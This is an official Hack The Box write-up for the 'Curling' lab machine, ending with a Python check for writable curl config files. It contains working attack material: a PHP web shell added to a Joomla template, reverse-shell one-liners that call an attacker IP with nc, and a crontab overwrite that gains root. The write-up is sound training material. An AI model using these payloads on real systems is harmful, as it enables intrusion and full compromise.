160-Curling_HTB_Official_writeup_Tamarisk

The document outlines the process for exploiting an Easy difficulty Linux box named Curling, which involves enumeration to discover a password in a web root file and gaining access through a Joomla CMS. It details steps for remote code execution via a modified PHP template, retrieving a user shell by reversing a hex dump, and escalating privileges through a cron job exploit. The document provides specific commands and methods used throughout the process, including the use of tools like Nmap and pspy.

Curling

08th May 2019 / Document No D19.100.19


Prepared By: MinatoTW
Machine Author: l4mpje
Difficulty: Easy
Classification: Official

Page 1 / 10
SYNOPSIS
Curling is an Easy difficulty Linux box which requires a fair amount of enumeration. The password
is saved in a file on the web root. The username can be discovered through a post on the CMS,
which allows a login. Modifying the PHP template gives a shell. Finding a hex dump and reversing
it gives a user shell. On enumerating running processes a cron job is discovered which can be
exploited for root.

Skills Required

● Enumeration

Skills Learned

● Analyzing hex dump
● Curl usage

ENUMERATION

NMAP
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.150 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.150 --open

Apache is running on port 80 and SSH on port 22.

APACHE

Navigating to port 80 we come across a Joomla website.

The page contains two usernames “Super user” and Floris.

Checking the HTML source of the page reveals a comment mentioning secret.txt.

Checking http://10.10.10.150/secret.txt we find a string which is base64 encoded. Decoding it
gives the string “Curling2018!”.

curl -s http://10.10.10.150/secret.txt | base64 -d

Going to the admin page at http://10.10.10.150/administrator/ and trying to log in with the
username Floris and password Curling2018! logs us in.

FOOTHOLD

Logging in gives us access to the control panel.

On the right side under Configuration click on Templates > Templates > Protostar.

Now click on a PHP file such as index.php and add the following line to execute commands.

system($_REQUEST['pwn']);

Click on Save; commands can now be passed to /index.php through the pwn parameter.

Now that we have RCE we can get a reverse shell.

curl http://10.10.10.150/index.php -G --data-urlencode 'pwn=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f'

Get a TTY shell by running:

python3 -c "import pty;pty.spawn('/bin/bash')"

LATERAL MOVEMENT

HEX DUMP

Navigating to /home/floris we find a file named password_backup.

The file looks like a hex dump produced with xxd, which can be reversed with xxd -r.

cd /tmp
cp /home/floris/password_backup .
cat password_backup | xxd -r > bak
file bak

The resulting file is bzip2 compressed.
The file appears to be repeatedly archived; running file after each step identifies the next layer. The steps to decompress it are:

bzip2 -d bak
file bak.out
mv bak.out bak.gz
gzip -d bak.gz
file bak
bzip2 -d bak
file bak.out
tar xf bak.out
cat password.txt

The extracted file, password.txt, contains the password for floris. We can now SSH in as floris with
the discovered password.

PRIVILEGE ESCALATION

ENUMERATION

We enumerate the running cron jobs using pspy. Download the smaller binary and transfer it to the box.

wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64s

scp pspy64s floris@10.10.10.150:/tmp

cd /tmp
chmod +x pspy64s
./pspy64s

After letting it run for a minute we find a cron job running curl with the -K option.

According to the curl manpage, the -K option is used to specify a config file. The cron job uses a
file named input as the config and writes its output to a file named report.

The input file is owned by our group, so we can write our own config. From the manpage we
know that the “output” parameter can be used to specify the output file. We can create a
malicious crontab and overwrite the real one on the box.

MANIPULATING THE CONFIG

First create a malicious crontab locally and start a simple HTTP server.

cp /etc/crontab .
echo '* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f ' >> crontab
python3 -m http.server 80

Now edit the input config on the box so that it contains:

url = "http://10.10.14.2/crontab"
output = "/etc/crontab"

A shell should be received within a minute.
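The weakness here is a curl config file that the job's user can rewrite, letting `output` point anywhere root can write. As an added defensive check (not from the writeup), the following parses curl -K config lines, flags output destinations that escape the job's directory or land on a system path, and checks the config's permission bits for group/world write; the allowed directory and the sample configs are constructed.

```python
import posixpath
import re
import stat

# Assumed working directory of the cron job's curl run (not taken from the writeup).
ALLOWED_DIR = "/home/floris/curl-job"
# Constructed list of prefixes no cron-driven download should ever write to.
SYSTEM_PREFIXES = ("/etc/", "/root/", "/var/spool/cron/", "/usr/", "/bin/", "/sbin/")

# curl -K syntax: `option = "value"`, `option: value`, `option value` or `-o value`; # starts a comment.
_OPT = re.compile(r'^-{0,2}([A-Za-z][\w-]*)\s*(?:[=:]\s*|\s+)"?([^"]*?)"?$')


def parse_curl_config(text):
    """Return (option, value) pairs from a curl config file, lower-casing option names."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _OPT.match(line)
        if m:
            pairs.append((m.group(1).lower(), m.group(2)))
    return pairs


def audit_outputs(text, allowed_dir=ALLOWED_DIR):
    """Flag every output destination that escapes allowed_dir or lands on a system path."""
    findings = []
    for opt, val in parse_curl_config(text):
        if opt not in ("o", "output"):
            continue
        # Resolve relative paths against the job directory and collapse any ../ segments.
        target = posixpath.normpath(val if val.startswith("/") else posixpath.join(allowed_dir, val))
        if target != allowed_dir and not target.startswith(allowed_dir + "/"):
            findings.append(f"output escapes {allowed_dir}: {val} -> {target}")
        if target.startswith(SYSTEM_PREFIXES):
            findings.append(f"output targets a system path: {target}")
    return findings


def config_is_writable_by_others(mode):
    """True when a config's st_mode grants group or world write, the condition abused on the box."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
```

Run `audit_outputs` over each -K config referenced from root-owned cron entries and treat any finding, or a True from `config_is_writable_by_others(os.stat(path).st_mode)`, as a misconfiguration to fix.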
